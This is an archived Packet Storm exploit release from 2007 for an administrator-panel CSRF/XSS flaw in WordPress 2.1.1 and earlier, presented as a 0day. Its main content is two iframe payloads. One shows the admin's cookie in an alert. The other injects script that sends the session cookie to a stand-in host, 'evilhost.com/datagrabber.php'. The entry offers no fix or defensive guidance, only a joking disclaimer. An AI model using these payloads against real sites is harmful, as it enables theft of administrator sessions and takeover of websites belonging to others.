wp211-csrfxss.txt

2007-03-06T00:00:00
ID PACKETSTORM:54793
Type packetstorm
Reporter Samenspender
Modified 2007-03-06T00:00:00

Description

                                        
                                            `-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA1  
  
+---------------------------------------------------------------------------+  
| SaMuschie Research Labs proudly presents . . . |   
+---------------------------------------------------------------------------+  
| Application: wordpress Version: <= 2.1.1 |   
| Vuln./Exploit Type: AdminPanel CSRF/XSS Status: 0day |   
+---------------------------------------------------------------------------+  
| Discovered by: Samenspender Released: 20070226 |   
| SaMuschie Release Number: 1 |   
+---------------------------------------------------------------------------+  
  
Exploit:  
  
Cookie in an Alert Box:  
<iframe width=600 height=400  
src='http://example.com/wp-admin/post.php?action=delete&post=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3Clol=%27'></iframe>  
  
Cookie send to an Evil Host:  
<iframe width=600 height=400  
src='http://example.com/wp-admin/post.php?action=delete&post=%27%3E%3Cscript%3Eimage=document.createElement(%27img%27);image.src=%27http://evilhost.com/datagrabber.php?cookie=%27%2bdocument.cookie;%3C/script%3E%3Clol=%27'></iframe>  
  
+---------------------------------------------------------------------------+  
| Lameness Disclaimer |   
+---------------------------------------------------------------------------+  
| SaMuschie Research Labs was found to publish vulnerabilities within well |   
| known software products, which are easy to discover and exploit. |   
| |   
| SaMuschie researchers just spend a minimum of time and knowledge for each |  
| vulnerability. Hence readers of this advisory are requested not to ask |   
| any questions to the researchers.... they don't know the answer ;) |   
+---------------------------------------------------------------------------+  
+---------------------------------------------------------------------------+  
| EOF |   
+---------------------------------------------------------------------------+  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1.4.6 (GNU/Linux)  
  
iD8DBQFF4xadMFgfGpQK8VERAkO5AJ9V8uosk2DATRTARHDhPxNe+RHirgCeKQ0h  
aFgDpHnxPP+/4Ot5bLBZy9Q=  
=/gS4  
-----END PGP SIGNATURE-----  
  
  
  
  
  
  
  
___________________________________________________________   
Der frühe Vogel fängt den Wurm. Hier gelangen Sie zum neuen Yahoo! Mail: http://mail.yahoo.de  
`